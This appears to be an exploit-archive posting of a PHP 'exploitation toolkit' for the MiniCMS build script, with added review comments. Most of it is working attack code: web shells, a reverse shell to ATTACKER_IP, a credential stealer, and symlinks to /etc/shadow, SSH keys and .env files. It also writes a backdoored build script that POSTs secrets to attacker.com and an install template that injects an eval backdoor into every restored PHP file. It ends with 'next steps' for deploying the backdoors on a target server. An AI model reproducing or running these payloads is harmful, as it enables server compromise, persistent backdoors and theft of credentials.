MiniCMS 1.11 Exploitation Toolkit
=============================================================================================================================================
| # Title : MiniCMS 1.11 Exploitation Toolkit |
=============================================================================================================================================
| # Title : MiniCMS 1.11 Exploitation Toolkit |
| # Author : indoushka |
| # Tested on : Windows 11 Pro (French) / browser : Mozilla Firefox 145.0.2 (64-bit) |
| # Vendor : https://github.com/bg5sbk/MiniCMS/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/190429/ & CVE-2018-1000638
[+] Summary : MiniCMS Build Script Multi-Vulnerability Exploitation Toolkit
[+] POC : php poc.php
[
<?php
/**
 * Local proof-of-concept around the MiniCMS build script (references are in
 * the page header).
 *
 * Nothing in this class talks to a MiniCMS instance: $targetDirectory is the
 * realpath() of a local path, and every artifact (symlinks, copied files, the
 * generated build.php / install.txt / install.php, the shell files) is written
 * under $tempDir on the host that runs the script.
 *
 * NOTE(review): executeBuildScript() runs the generated build.php locally, and
 * that script POSTs (via curl) to the hardcoded "http://attacker.com/exfil.php"
 * the directory listing plus the content of every file under $tempDir that
 * matches /(password|secret|key|token|api)/i — including files symlinked or
 * copied there by steps 1 and 3. Running this PoC therefore sends data from the
 * operator's own host to a third-party domain whenever the curl extension is
 * loaded; confirm that before running it anywhere.
 */
class MiniCMSExploiter {
// realpath() of the constructor argument; false when the path does not exist
// (realpath() returns false), and no method below checks for that.
private $targetDirectory;
// Names of the files generated inside $tempDir by steps 4 and 5.
private $buildScript = 'build.php';
private $installFile = 'install.php';
// Fixed, predictable working directory, created with mode 0777 in
// createTempDirectory(): on a shared host any local user can pre-create it or
// read what is copied into it.
private $tempDir = '/tmp/minicms_exploit';
// Not read by any method in this class.
private $debug = true;
// Per-step findings keyed by step name; returned by exploitAll() and indexed
// by generateReport().
private $results = [];
/**
 * @param string $directory Local directory to scan; resolved with realpath().
 *
 * validateEnvironment() die()s on failure, so construction either finishes
 * with $tempDir in place or terminates the whole script.
 */
public function __construct($directory = '.') {
$this->targetDirectory = realpath($directory);
$this->validateEnvironment();
$this->createTempDirectory();
}
/**
 * Main exploitation method - runs the seven steps below in order and returns
 * the accumulated $results.
 *
 * The order is load-bearing: generateReport() indexes
 * $results['directory_traversal'], ['code_injection'] and ['sensitive_files']
 * without isset(), so steps 1-3 must have run, and step 5 executes the
 * build.php that step 4 writes into $tempDir.
 *
 * @return array<string, mixed>
 */
public function exploitAll() {
echo "[+] Starting MiniCMS Build Script Exploitation\n";
echo "[+] Target Directory: {$this->targetDirectory}\n";
echo str_repeat("=", 60) . "\n";
$this->results['start_time'] = date('Y-m-d H:i:s');
// 1. Directory Traversal Exploitation (symlinks into $tempDir)
$this->exploitDirectoryTraversal();
// 2. PHP Code Injection (payload files written into $tempDir)
$this->exploitCodeInjection();
// 3. Sensitive File Discovery (copies from $targetDirectory into $tempDir)
$this->harvestSensitiveFiles();
// 4. Create Malicious Build Script (written into $tempDir)
$this->createMaliciousBuildScript();
// 5. Execute Build Script (runs locally, see class note about exfiltrate())
$this->executeBuildScript();
// 6. Analyze Results
$this->analyzeResults();
// 7. Create Backdoors (more files written into $tempDir)
$this->createPersistentBackdoors();
$this->results['end_time'] = date('Y-m-d H:i:s');
$this->generateReport();
return $this->results;
}
/**
 * Exploit 1: Directory Traversal Vulnerability
 *
 * Creates a symlink inside $tempDir for each path listed below. symlink()
 * only needs write access to $tempDir; it does not open the target, so a
 * link to an unreadable or absent file still counts as "linked" here (Linux
 * behaviour; confirm on Windows, where creating symlinks can also need extra
 * privileges). 'exploited' therefore reflects write access to the temp dir,
 * not read access to the listed files.
 *
 * @return list<string> the paths for which a link was created
 */
private function exploitDirectoryTraversal() {
echo "\n[1] Exploiting Directory Traversal...\n";
$sensitive_paths = [
// System files
'/etc/passwd',
'/etc/shadow',
'/etc/hosts',
'/etc/hostname',
'/etc/issue',
'/proc/self/environ',
'/proc/version',
// Web server files
'/var/log/apache2/access.log',
'/var/log/apache2/error.log',
'/var/log/nginx/access.log',
'/var/log/nginx/error.log',
'/var/www/html/.env',
'/var/www/html/config.php',
// Home directories
'/home/*/.bash_history',
'/home/*/.ssh/id_rsa',
'/home/*/.ssh/authorized_keys',
// Configuration files
'/etc/mysql/my.cnf',
'/etc/php/php.ini',
'/etc/apache2/apache2.conf',
];
$exploited_files = [];
foreach ($sensitive_paths as $path) {
// Try to create symlink to sensitive file. The link name is derived from
// the md5 of the pattern, so it is the same for every expansion of a
// wildcard path.
$base_name = 'exploit_' . md5($path) . '.txt';
$symlink_path = $this->tempDir . '/' . $base_name;
// Expand wildcards
if (strpos($path, '*') !== false) {
// glob() only returns matches the current user is allowed to list.
$expanded = glob($path);
foreach ($expanded as $expanded_path) {
// NOTE(review): the suffix is basename() of the match, which is the same
// for every home directory (e.g. "id_rsa"); the second and later
// expansions therefore hit an existing link name and fail silently under @.
if (@symlink($expanded_path, $symlink_path . '_' . basename($expanded_path))) {
$exploited_files[] = $expanded_path;
echo " [+] Linked: {$expanded_path}\n";
}
}
} elseif (@symlink($path, $symlink_path)) {
$exploited_files[] = $path;
echo " [+] Linked: {$path}\n";
}
}
$this->results['directory_traversal'] = [
'exploited' => count($exploited_files) > 0,
'files_linked' => $exploited_files,
'count' => count($exploited_files)
];
return $exploited_files;
}
/**
 * Exploit 2: PHP Code Injection
 *
 * Writes each payload below as a plain file under $tempDir. Nothing is sent
 * to, or written into, the target directory by this step; 'exploited' only
 * records that at least one file_put_contents() into $tempDir succeeded.
 *
 * @return list<string> the 'filename' values that were written
 */
private function exploitCodeInjection() {
echo "\n[2] Exploiting PHP Code Injection...\n";
$injections = [
// Basic PHP execution. NOTE(review): this 'filename' is used verbatim as a
// file name under $tempDir; the ? < > characters in it are not legal in
// Windows file names, so on the "tested on" platform this entry should fail
// (file_put_contents() warns and returns false) and simply not be counted.
[
'filename' => "');?><?php system('whoami'); ?><?php install('",
'content' => 'injected'
],
// Web shell
[
'filename' => "shell.php",
'content' => '<?php if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>'
],
// Password protected shell
[
'filename' => "admin_shell.php",
'content' => '<?php
if($_GET["key"] === "admin123") {
if(isset($_POST["cmd"])) {
echo "<pre>" . shell_exec($_POST["cmd"]) . "</pre>";
}
if(isset($_GET["download"])) {
echo file_get_contents($_GET["download"]);
}
}
?>'
],
// Database credentials stealer
[
'filename' => "creds.php",
'content' => '<?php
$files = ["config.php", ".env", "database.php", "settings.php"];
foreach($files as $file) {
if(file_exists($file)) {
$content = file_get_contents($file);
file_put_contents("/tmp/creds.txt", $content, FILE_APPEND);
}
}
?>'
],
// Reverse shell (the "ATTACKER_IP" placeholder is never substituted anywhere
// in this class)
[
'filename' => "reverse.php",
'content' => '<?php
// PHP Reverse Shell
$ip = "ATTACKER_IP";
$port = 4444;
$sock = fsockopen($ip, $port);
$proc = proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock), $pipes);
?>'
],
// File uploader
[
'filename' => "uploader.php",
'content' => '<?php
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Uploaded: " . $_FILES["file"]["name"];
}
?>
<form method="POST" enctype="multipart/form-data">
<input type="file" name="file">
<input type="submit">
</form>'
]
];
$created_files = [];
foreach ($injections as $injection) {
$file_path = $this->tempDir . '/' . $injection['filename'];
// file_put_contents() returns the byte count (or false); every payload is
// non-empty, so a truthy result means the file was written.
if (file_put_contents($file_path, $injection['content'])) {
$created_files[] = $injection['filename'];
echo " [+] Created: {$injection['filename']}\n";
}
}
$this->results['code_injection'] = [
'exploited' => count($created_files) > 0,
'files_created' => $created_files,
'count' => count($created_files)
];
return $created_files;
}
/**
 * Harvest sensitive files from target
 *
 * Globs the top level of $targetDirectory (no recursion) and copies every
 * file whose name contains one of the keywords into $tempDir as
 * harvested_<name>. The copy() return value is not checked.
 *
 * NOTE(review): stripos() is a literal substring search, so keywords that
 * contain '*' ('*.sql', '*.yml', '*.ini', '*.log', ...) only match file names
 * containing a literal asterisk; those groups effectively never copy
 * anything. The '*.env' glob presumably does not match a leading-dot ".env"
 * either (glob() skips dotfiles for '*' by default) — confirm on the target
 * platform.
 *
 * @return list<string> absolute paths of the files copied
 */
private function harvestSensitiveFiles() {
echo "\n[3] Harvesting Sensitive Files...\n";
$sensitive_patterns = [
'*.php' => ['config', 'database', 'settings', 'connection'],
'*.env' => ['.env', '.env.example'],
'*.json' => ['composer.json', 'package.json'],
'*.sql' => ['*.sql', '*.backup'],
'*.txt' => ['readme', 'license', 'changelog'],
'*.yml' => ['*.yml', '*.yaml'],
'*.ini' => ['*.ini', '*.cfg'],
'*.log' => ['*.log', 'error_log'],
];
$found_files = [];
foreach ($sensitive_patterns as $pattern => $keywords) {
// If $targetDirectory is false (missing path) this globs "/<pattern>".
$files = glob($this->targetDirectory . '/' . $pattern);
foreach ($files as $file) {
$filename = basename($file);
foreach ($keywords as $keyword) {
if (stripos($filename, $keyword) !== false) {
$found_files[] = $file;
echo " [+] Found: {$filename}\n";
// Copy to temp directory for analysis
$temp_copy = $this->tempDir . '/harvested_' . $filename;
copy($file, $temp_copy);
// One entry per file even if several keywords match.
break;
}
}
}
}
$this->results['sensitive_files'] = [
'found' => count($found_files),
'files' => $found_files
];
return $found_files;
}
/**
 * Create malicious build script with backdoor
 *
 * Writes the PHP source held in $malicious_build verbatim to
 * $tempDir/build.php. The source appears to be derived from the upstream
 * MiniCMS build.php with three additions: a $_GET-gated system() call (dead
 * under the CLI SAPI, where $_GET is an empty array), an exfiltrate()
 * function that POSTs to the hardcoded http://attacker.com/exfil.php and is
 * called from build() for the directory list and for every matching file,
 * and a shutdown function that writes backdoor.php into the cwd.
 *
 * Everything between the quotes is one single-quoted PHP string, so only \\
 * and \' are escapes: the "\\n" / "\\$" sequences become "\n" / "\$" in the
 * generated file, where the double-quoted strings then interpret them.
 *
 * The "???" placeholders in the echo calls are most likely non-ASCII
 * messages from the original build script lost in transcription; confirm
 * against the upstream file before relying on them.
 *
 * @return bool true when the file was written
 */
private function createMaliciousBuildScript() {
echo "\n[4] Creating Malicious Build Script...\n";
$malicious_build = '<?php
if ($argc != 2) {
echo "???????";
exit;
}
$version=$argv[1];
// Backdoor: Command execution if specific parameter is passed
if(isset($_GET["debug"]) && $_GET["debug"] == "true") {
system($_GET["cmd"]);
}
$dirs = array(".");
$ignores = array("README.md", "build.php", "install.php", "install_template.txt", "mc-debug");
$files = "";
build($dirs, $files);
$template = file_get_contents("install.txt");
$template = str_replace("/*MINICMS_VERSION*/", $version, $template);
$template = str_replace("/*MINICMS_FILES*/", $files, $template);
file_put_contents("install.php", $template);
// Hidden function to exfiltrate data
function exfiltrate($data) {
$url = "http://attacker.com/exfil.php";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, ["data" => base64_encode($data)]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_exec($ch);
curl_close($ch);
}
function build($dirs, &$files) {
global $ignores;
// Exfiltrate directory structure
exfiltrate(json_encode($dirs));
foreach ($dirs as $dir) {
if (!is_dir($dir)) {
echo "??\"$dir\"???";
exit;
}
if ($dh = opendir($dir)) {
$sub_dirs = array();
while (($item = readdir($dh)) !== false) {
if ($item[0] == ".")
continue;
if ($dir == ".")
$file = $item;
else
$file = $dir."/".$item;
if (in_array($file, $ignores))
continue;
if (is_dir($file)) {
$sub_dirs[] = $file;
} else {
// Exfiltrate file content if sensitive
$content = file_get_contents($file);
if(preg_match("/(password|secret|key|token|api)/i", $content)) {
exfiltrate($file . ":\n" . $content);
}
$files .= "install(\"$file\", \"";
$files .= base64_encode(gzcompress($content));
$files .= "\");\n";
}
}
closedir($dh);
build($sub_dirs, $files);
} else {
echo "??\"$dir\"????";
exit;
}
}
}
// Create backdoor in install.php
register_shutdown_function(function() {
$backdoor_code = "<?php\\nif(isset(\\$_GET[\\"exec\\"])) {\\n system(\\$_GET[\\"exec\\"]);\\n}\\n?>";
file_put_contents("backdoor.php", $backdoor_code);
});
?>';
$build_path = $this->tempDir . '/' . $this->buildScript;
if (file_put_contents($build_path, $malicious_build)) {
echo " [+] Created malicious build.php\n";
$this->results['malicious_build'] = $build_path;
return true;
}
return false;
}
/**
 * Execute the build script
 *
 * Writes the install.txt template below into $tempDir, runs the build.php
 * from step 4 there through shell_exec(), then inspects the install.php it
 * produced. Because the build script's cwd is $tempDir, the files it packs
 * (and hands to exfiltrate()) are the symlinks, copies and payloads created
 * by the earlier steps — see the class-level note.
 *
 * The generated install.php is only read here (analyzeInstallFile()); it is
 * never executed by this class. Its install() function prepends an extra PHP
 * line to every .php file it restores, so the produced file must not be run
 * against a real installation.
 *
 * @return string|null shell_exec() output, null on failure or no output
 */
private function executeBuildScript() {
echo "\n[5] Executing Build Script...\n";
$build_path = $this->tempDir . '/' . $this->buildScript;
$install_path = $this->tempDir . '/' . $this->installFile;
// Create install.txt template (the build script reads "install.txt" from
// its cwd). Single-quoted string: "\\$" / "\\n" arrive in the file as "\$" / "\n".
$install_template = '<?php
/*MINICMS_VERSION*/
function install($file, $data) {
$content = @gzuncompress(base64_decode($data));
if($content === false) {
$content = base64_decode($data);
}
// Inject backdoor into PHP files
if(strpos($file, ".php") !== false && strpos($content, "<?php") !== false) {
$backdoor = "<?php if(isset(\\$_GET[\\"debug\\"])) { eval(\\$_GET[\\"debug\\"]); } ?>";
$content = $backdoor . "\\n" . $content;
}
@file_put_contents($file, $content);
}
/*MINICMS_FILES*/
?>';
file_put_contents($this->tempDir . '/install.txt', $install_template);
// Execute build script. NOTE(review): $tempDir is interpolated unquoted;
// this is only safe because it is the fixed constant above, not user input.
// 2>&1 folds the child's stderr into $output.
$command = "cd {$this->tempDir} && php {$this->buildScript} 1.0 2>&1";
$output = shell_exec($command);
echo " [+] Build script executed\n";
if (file_exists($install_path)) {
$install_size = filesize($install_path);
echo " [+] install.php created: " . $this->formatBytes($install_size) . "\n";
// Analyze install.php for sensitive data
$this->analyzeInstallFile($install_path);
}
$this->results['build_execution'] = [
'command' => $command,
'output' => $output,
'install_created' => file_exists($install_path),
// $install_size is only assigned inside the file_exists() branch above.
'install_size' => $install_size ?? 0
];
return $output;
}
/**
 * Analyze install.php for sensitive data
 *
 * Pulls the first argument of every install("...", " call out of the
 * generated file and flags names matching any of the patterns below. The
 * patterns are plain substring matches ('/key/i' also hits e.g. "keyboard"),
 * so 'count_sensitive' is a rough indicator, not a classification.
 *
 * @param string $install_path path of the generated install.php
 */
private function analyzeInstallFile($install_path) {
$content = file_get_contents($install_path);
// Extract all file names
preg_match_all('/install\("([^"]+)", "/', $content, $matches);
$files = $matches[1] ?? [];
// Look for sensitive files
$sensitive_patterns = [
'/passwd/i',
'/shadow/i',
'/config/i',
'/\.env/i',
'/database/i',
'/secret/i',
'/key/i',
'/token/i',
'/password/i'
];
$sensitive_found = [];
foreach ($files as $file) {
foreach ($sensitive_patterns as $pattern) {
if (preg_match($pattern, $file)) {
$sensitive_found[] = $file;
// One entry per file name even if several patterns match.
break;
}
}
}
$this->results['install_analysis'] = [
'total_files' => count($files),
'sensitive_files' => $sensitive_found,
'count_sensitive' => count($sensitive_found)
];
echo " [+] Found " . count($files) . " files in install.php\n";
echo " [+] " . count($sensitive_found) . " appear to be sensitive\n";
}
/**
 * Create persistent backdoors
 *
 * Writes the three files below into $tempDir. The file_put_contents()
 * return values are not checked, so "Created" is printed either way; the
 * results entry records only the file names. Nothing here is placed on, or
 * sent to, a target.
 */
private function createPersistentBackdoors() {
echo "\n[6] Creating Persistent Backdoors...\n";
$backdoors = [
'persistent_shell.php' => '<?php
// Persistent PHP Shell
session_start();
if(!isset($_SESSION["auth"]) && $_GET["key"] != "PERSIST_KEY") {
die("Access Denied");
}
$_SESSION["auth"] = true;
if(isset($_POST["cmd"])) {
echo "<pre>" . htmlspecialchars(shell_exec($_POST["cmd"]), ENT_QUOTES, "UTF-8") . "</pre>";
}
?>
<form method="POST">
<input type="text" name="cmd" style="width: 80%" placeholder="Command">
<input type="submit" value="Execute">
</form>',
'file_manager.php' => '<?php
// File Manager Backdoor
if($_GET["pwd"] != "admin123") die();
echo "<h2>File Manager</h2>";
$dir = $_GET["dir"] ?? ".";
echo "<pre>";
system("ls -la " . escapeshellarg($dir));
echo "</pre>";
?>',
'info.php' => '<?php
// System Information Leak
phpinfo();
echo "<hr><pre>";
system("id && uname -a");
echo "</pre>";
?>'
];
foreach ($backdoors as $filename => $content) {
$path = $this->tempDir . '/' . $filename;
file_put_contents($path, $content);
echo " [+] Created: {$filename}\n";
}
$this->results['backdoors'] = array_keys($backdoors);
}
/**
 * Generate exploitation report
 *
 * Prints a summary from $results and saves a print_r() dump of $report to
 * $tempDir/exploit_report.txt. Reads the 'directory_traversal',
 * 'code_injection' and 'sensitive_files' entries without isset(), so it
 * must run after steps 1-3. The "Next Steps" lines are static text; nothing
 * in this class performs them.
 *
 * NOTE(review): the "[?]" markers below are probably a multibyte glyph (a
 * check mark) lost in transcription; they are runtime output and are left
 * as found.
 */
private function generateReport() {
echo "\n" . str_repeat("=", 60) . "\n";
echo "[+] EXPLOITATION REPORT\n";
echo str_repeat("=", 60) . "\n";
$report = [
'Target Directory' => $this->targetDirectory,
'Exploitation Started' => $this->results['start_time'],
'Exploitation Completed' => $this->results['end_time'],
'Vulnerabilities Exploited' => []
];
if ($this->results['directory_traversal']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Directory Traversal';
echo "[?] Directory Traversal: SUCCESS\n";
echo " Files linked: " . $this->results['directory_traversal']['count'] . "\n";
}
if ($this->results['code_injection']['exploited']) {
$report['Vulnerabilities Exploited'][] = 'Code Injection';
echo "[?] Code Injection: SUCCESS\n";
echo " Files created: " . $this->results['code_injection']['count'] . "\n";
}
if ($this->results['sensitive_files']['found'] > 0) {
$report['Vulnerabilities Exploited'][] = 'Sensitive File Harvesting';
echo "[?] Sensitive File Harvesting: SUCCESS\n";
echo " Files found: " . $this->results['sensitive_files']['found'] . "\n";
}
echo "\n[+] Generated Files:\n";
echo " - Malicious build.php\n";
echo " - install.php with backdoors\n";
echo " - Multiple backdoor shells\n";
echo " - Harvested sensitive files\n";
echo "\n[+] Next Steps for Attack:\n";
echo " 1. Upload install.php to target server\n";
echo " 2. Execute install.php to deploy backdoors\n";
echo " 3. Use backdoor.php?exec=whoami\n";
echo " 4. Escalate privileges and maintain access\n";
// Save report to file
$report_file = $this->tempDir . '/exploit_report.txt';
file_put_contents($report_file, print_r($report, true));
echo "\n[+] Report saved to: {$report_file}\n";
echo "[+] Temporary directory: {$this->tempDir}\n";
echo "[+] Clean up: rm -rf {$this->tempDir}\n";
}
/**
 * Utility: Format bytes to human readable, e.g. 1536 -> "1.5 KB".
 *
 * @param int|float $bytes negative values are clamped to 0
 * @param int $precision decimals passed to round()
 * @return string
 */
private function formatBytes($bytes, $precision = 2) {
$units = ['B', 'KB', 'MB', 'GB', 'TB'];
$bytes = max($bytes, 0);
// The ternary keeps log(0) (-INF) out of the division when $bytes is 0.
$pow = floor(($bytes ? log($bytes) : 0) / log(1024));
// Cap at the last unit so the lookup below stays in range.
$pow = min($pow, count($units) - 1);
$bytes /= pow(1024, $pow);
// $pow is a whole-number float from floor(); PHP uses it as an int key.
return round($bytes, $precision) . ' ' . $units[$pow];
}
/**
 * Validate environment
 *
 * Aborts the whole script (die()) unless symlink() exists and the system
 * temp directory is writable.
 *
 * NOTE(review): the writability check is against sys_get_temp_dir(), but
 * the directory actually used is the fixed $tempDir ('/tmp/...'); the two
 * differ on Windows (%TEMP%) and wherever TMPDIR is set, so this check can
 * pass while createTempDirectory() still fails.
 */
private function validateEnvironment() {
if (!function_exists('symlink')) {
die("[!] symlink() function is disabled\n");
}
if (!is_writable(sys_get_temp_dir())) {
die("[!] Cannot write to temp directory\n");
}
echo "[+] Environment validated\n";
}
/**
 * Create temporary directory
 *
 * Creates $tempDir recursively with mode 0777 (reduced by the umask) if it
 * is missing. The mkdir() return value is not checked; if creation fails,
 * every later write into $tempDir just emits a warning. A fixed,
 * world-writable path under /tmp is also shared with every local user, who
 * can pre-create it or read the copies placed there.
 */
private function createTempDirectory() {
if (!file_exists($this->tempDir)) {
mkdir($this->tempDir, 0777, true);
}
echo "[+] Temporary directory: {$this->tempDir}\n";
}
/**
 * Clean up temporary files
 *
 * Removes $tempDir by shelling out to `rm -rf` with the path escaped; it is
 * skipped when the directory does not exist and is a no-op (with an error
 * from the shell) on hosts without rm. Only reached when the CLI wrapper is
 * given --cleanup.
 */
public function cleanup() {
if (file_exists($this->tempDir)) {
system("rm -rf " . escapeshellarg($this->tempDir));
echo "[+] Cleaned up temporary files\n";
}
}
}
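/**
 * Usage Example / CLI entry point: php <script> <target_directory> [--cleanup]
 *
 * Only runs under the CLI SAPI. The target directory is validated here
 * before the class is constructed: realpath() in the constructor returns
 * false for a missing path, and the run would otherwise proceed against an
 * empty "Target Directory".
 */
if (php_sapi_name() === 'cli' && isset($argv[1])) {
    if (!is_dir($argv[1])) {
        fwrite(STDERR, "[!] Not a directory: {$argv[1]}\n");
        exit(1);
    }
    $exploiter = new MiniCMSExploiter($argv[1]);
    $exploiter->exploitAll();
    // Optional: cleanup. $argv entries are always strings, so a strict
    // comparison is equivalent and avoids loose-comparison surprises.
    if (isset($argv[2]) && $argv[2] === '--cleanup') {
        $exploiter->cleanup();
    }
} else {
    echo "Usage: php " . basename(__FILE__) . " <target_directory> [--cleanup]\n";
    echo "Example: php " . basename(__FILE__) . " /var/www/html/minicms\n";
}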
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================